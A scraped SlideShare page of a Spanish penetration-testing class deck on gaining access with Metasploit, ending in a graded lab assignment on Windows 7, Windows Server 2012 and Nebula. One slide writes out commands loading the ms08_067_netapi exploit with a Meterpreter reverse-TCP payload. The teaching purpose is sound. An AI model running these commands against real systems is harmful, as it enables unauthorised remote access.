SlideShare una empresa de Scribd logo
1 de 12
Descargar para leer sin conexión
Docente: Alan G.
Docente: Alan G.
Proceso
Reconocimiento
Enumeración
y Escaneo
Acceso
Mantener
Acceso
Cubrir
Rastros
Docente: Alan G.
Ejecutar Exploits
Desarrollado en
Ruby
Acceso
Metasploit
Docente: Alan G.
Escaneo de
Vulnerabilidades
Identificación de
CVE
Identificación de
Exploits
Ejecución de
Exploits
Acceso
Metasploit
Docente: Alan G.
ü Compatible con los principales S.O.
ü Backtrack – Kali Linux posee dicha herramienta
instalada por defecto.
ü El comando msfconsole permite acceder a esta desde
consola.
Acceso
Metasploit
Docente: Alan G.
ü Con el comando msfupdate se actualizará la base de
datos en cuanto a exploits y payloads se refiere.
ü El comando use se utilizará para llamar un exploit.
ü El comando set se utilizará para llamar un payload.
Acceso
Metasploit
Docente: Alan G.
ü LHOST lo cual resulta ser la IP del equipo atacante,
ejecutándose con el comando set LHOST x.x.x.x.
ü RHOST lo cual resulta ser la IP del equipo víctima,
ejecutándose con el comando set RHOST x.x.x.x.
ü LPORT lo cual indica el puerto del equipo atacante
desde el cual se establecerá la conexión.
ü RPORT lo cual indica el puerto del equipo víctima con
el cual se establecerá la conexión.
Acceso
Metasploit
Docente: Alan G.
Acceso
Metasploit
•  Una vez utilizado openvas:
root@kali:~# use windows/smb/ms08_067_netapi
root@kali:~# set payload windows/meterpreter/
reverse_tcp
Docente: Alan G.
ACTIVIDAD FINAL
Video de acceso a:
•  Windows 7
•  Win Server 2012
•  Pentest exploit-excercises – Nebula
Realizar primeros 4 Niveles
ü  https://exploit-exercises.com/nebula/
ü  https://www.youtube.com/watch?
v=UDF9VWc4NBQ
Docente: Alan G.
ACTIVIDAD FINAL
Entregables
•  Video explicativo para cada uno de los
casos.
•  Informe formato IEEE
Docente: Alan G.
ACTIVIDAD FINAL
Valoración
Tema Video Informe Total
Win 7 60% 40% 25%
Win Server 60% 40% 25%
Nebula 60% 40% 50%

Más contenido relacionado

La actualidad más candente

Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonWebsec México, S.C.
 
Depuración y profiling en Drupal: casos prácticos
Depuración y profiling en Drupal: casos prácticosDepuración y profiling en Drupal: casos prácticos
Depuración y profiling en Drupal: casos prácticosJavier Carranza
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapWebsec México, S.C.
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una BackdoorNEGOCIOS PROPIOS
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]RootedCON
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Charla de GStreamer en Flisol Puebla 2011 (BUAP)
Charla de GStreamer en Flisol Puebla 2011 (BUAP)Charla de GStreamer en Flisol Puebla 2011 (BUAP)
Charla de GStreamer en Flisol Puebla 2011 (BUAP)Noe Nieto
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Websec México, S.C.
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasRafael Seg
 
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]RootedCON
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Websec México, S.C.
 
Historia de los buffer overflows por Juan Sacco
Historia de los buffer overflows por Juan SaccoHistoria de los buffer overflows por Juan Sacco
Historia de los buffer overflows por Juan SaccoJuan Sacco
 
Apache Storm: Desarrollo
Apache Storm: DesarrolloApache Storm: Desarrollo
Apache Storm: DesarrolloStratebi
 
Evasión de Técnicas Forenses
Evasión de Técnicas ForensesEvasión de Técnicas Forenses
Evasión de Técnicas ForensesConferencias FIST
 
Juan Antonio Calles & Patricia Rada - Biohacking: Almacenando información en ...
Juan Antonio Calles & Patricia Rada - Biohacking: Almacenando información en ...Juan Antonio Calles & Patricia Rada - Biohacking: Almacenando información en ...
Juan Antonio Calles & Patricia Rada - Biohacking: Almacenando información en ...RootedCON
 

La actualidad más candente (19)

Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino Calderon
 
Depuración y profiling en Drupal: casos prácticos
Depuración y profiling en Drupal: casos prácticosDepuración y profiling en Drupal: casos prácticos
Depuración y profiling en Drupal: casos prácticos
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Pablo sanemeteriovalencia
Pablo sanemeteriovalenciaPablo sanemeteriovalencia
Pablo sanemeteriovalencia
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una Backdoor
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Charla de GStreamer en Flisol Puebla 2011 (BUAP)
Charla de GStreamer en Flisol Puebla 2011 (BUAP)Charla de GStreamer en Flisol Puebla 2011 (BUAP)
Charla de GStreamer en Flisol Puebla 2011 (BUAP)
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemas
 
Metasploit
MetasploitMetasploit
Metasploit
 
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]
 
Historia de los buffer overflows por Juan Sacco
Historia de los buffer overflows por Juan SaccoHistoria de los buffer overflows por Juan Sacco
Historia de los buffer overflows por Juan Sacco
 
Apache Storm: Desarrollo
Apache Storm: DesarrolloApache Storm: Desarrollo
Apache Storm: Desarrollo
 
Evasión de Técnicas Forenses
Evasión de Técnicas ForensesEvasión de Técnicas Forenses
Evasión de Técnicas Forenses
 
Juan Antonio Calles & Patricia Rada - Biohacking: Almacenando información en ...
Juan Antonio Calles & Patricia Rada - Biohacking: Almacenando información en ...Juan Antonio Calles & Patricia Rada - Biohacking: Almacenando información en ...
Juan Antonio Calles & Patricia Rada - Biohacking: Almacenando información en ...
 
P6 DOS ROUTERS
P6 DOS ROUTERSP6 DOS ROUTERS
P6 DOS ROUTERS
 

Similar a Clase no5 acceso

Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Adrián Lois
 
Seguridad_Informatica_KALI_LINUX.pdf
Seguridad_Informatica_KALI_LINUX.pdfSeguridad_Informatica_KALI_LINUX.pdf
Seguridad_Informatica_KALI_LINUX.pdfAmlcarCceres1
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentestingakencito
 
Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01Tensor
 
Presentacion kali linux
Presentacion kali linuxPresentacion kali linux
Presentacion kali linuxKevin Medina
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Telefónica
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocinaEfren Diaz Gomez
 
Shell script
Shell scriptShell script
Shell scriptuniminuto
 
Trabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaTrabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaarbeycardona2
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Brat Stell
 
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]RootedCON
 
Proteger el grub con clave
Proteger el grub con claveProteger el grub con clave
Proteger el grub con claveSarita Peña
 
V2 d2013 jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profitV2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013 jose l verdeguer - freepbx fun and profitVOIP2DAY
 

Similar a Clase no5 acceso (20)

Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]
 
Seguridad_Informatica_KALI_LINUX.pdf
Seguridad_Informatica_KALI_LINUX.pdfSeguridad_Informatica_KALI_LINUX.pdf
Seguridad_Informatica_KALI_LINUX.pdf
 
Ataque win xp
Ataque win xpAtaque win xp
Ataque win xp
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentesting
 
Metasploit
MetasploitMetasploit
Metasploit
 
Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01
 
Seguridad so pi_2011
Seguridad so pi_2011Seguridad so pi_2011
Seguridad so pi_2011
 
2013 03 - rooted - free pbx-for fun and profit
2013 03 - rooted - free pbx-for fun and profit2013 03 - rooted - free pbx-for fun and profit
2013 03 - rooted - free pbx-for fun and profit
 
Presentacion kali linux
Presentacion kali linuxPresentacion kali linux
Presentacion kali linux
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
 
Dns spoofing kali linux
Dns spoofing kali linuxDns spoofing kali linux
Dns spoofing kali linux
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
 
Shell script
Shell scriptShell script
Shell script
 
Trabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaTrabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensiva
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3
 
Present3
Present3Present3
Present3
 
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
 
Proteger el grub con clave
Proteger el grub con claveProteger el grub con clave
Proteger el grub con clave
 
V2 d2013 jose l verdeguer - freepbx fun and profit
V2 d2013   jose l verdeguer - freepbx fun and profitV2 d2013   jose l verdeguer - freepbx fun and profit
V2 d2013 jose l verdeguer - freepbx fun and profit
 
Nmap
NmapNmap
Nmap
 

Último

¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...CENECOnline
 
PSICOPATOLOGIA I.pptxdhehehehehehehehehe
PSICOPATOLOGIA I.pptxdhehehehehehehehehePSICOPATOLOGIA I.pptxdhehehehehehehehehe
PSICOPATOLOGIA I.pptxdheheheheheheheheheErickRolandoPadillaC1
 
Corte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuadCorte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuadJonathanHctorSilvaRo
 
Las redes sociales en el mercado digital
Las redes sociales en el mercado digitalLas redes sociales en el mercado digital
Las redes sociales en el mercado digitalNayaniJulietaRamosRa
 
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjjPPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjjNachisRamos
 
Unidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disolucionesUnidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disolucioneschorantina325
 

Último (6)

¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
 
PSICOPATOLOGIA I.pptxdhehehehehehehehehe
PSICOPATOLOGIA I.pptxdhehehehehehehehehePSICOPATOLOGIA I.pptxdhehehehehehehehehe
PSICOPATOLOGIA I.pptxdhehehehehehehehehe
 
Corte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuadCorte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuad
 
Las redes sociales en el mercado digital
Las redes sociales en el mercado digitalLas redes sociales en el mercado digital
Las redes sociales en el mercado digital
 
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjjPPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
 
Unidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disolucionesUnidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disoluciones
 

Clase no5 acceso

  • 2. Docente: Alan G. Proceso Reconocimiento Enumeración y Escaneo Acceso Mantener Acceso Cubrir Rastros
  • 3.
  • 4. Docente: Alan G. Ejecutar Exploits Desarrollado en Ruby Acceso Metasploit
  • 5. Docente: Alan G. Escaneo de Vulnerabilidades Identificación de CVE Identificación de Exploits Ejecución de Exploits Acceso Metasploit
  • 6. Docente: Alan G. ü Compatible con los principales S.O. ü Backtrack – Kali Linux posee dicha herramienta instalada por defecto. ü El comando msfconsole permite acceder a esta desde consola. Acceso Metasploit
  • 7. Docente: Alan G. ü Con el comando msfupdate se actualizará la base de datos en cuanto a exploits y payloads se refiere. ü El comando use se utilizará para llamar un exploit. ü El comando set se utilizará para llamar un payload. Acceso Metasploit
  • 8. Docente: Alan G. ü LHOST lo cual resulta ser la IP del equipo atacante, ejecutándose con el comando set LHOST x.x.x.x. ü RHOST lo cual resulta ser la IP del equipo víctima, ejecutándose con el comando set RHOST x.x.x.x. ü LPORT lo cual indica el puerto del equipo atacante desde el cual se establecerá la conexión. ü RPORT lo cual indica el puerto del equipo víctima con el cual se establecerá la conexión. Acceso Metasploit
  • 9. Docente: Alan G. Acceso Metasploit •  Una vez utilizado openvas: root@kali:~# use windows/smb/ms08_067_netapi root@kali:~# set payload windows/meterpreter/ reverse_tcp
  • 10. Docente: Alan G. ACTIVIDAD FINAL Video de acceso a: •  Windows 7 •  Win Server 2012 •  Pentest exploit-excercises – Nebula Realizar primeros 4 Niveles ü  https://exploit-exercises.com/nebula/ ü  https://www.youtube.com/watch? v=UDF9VWc4NBQ
  • 11. Docente: Alan G. ACTIVIDAD FINAL Entregables •  Video explicativo para cada uno de los casos. •  Informe formato IEEE
  • 12. Docente: Alan G. ACTIVIDAD FINAL Valoración Tema Video Informe Total Win 7 60% 40% 25% Win Server 60% 40% 25% Nebula 60% 40% 50%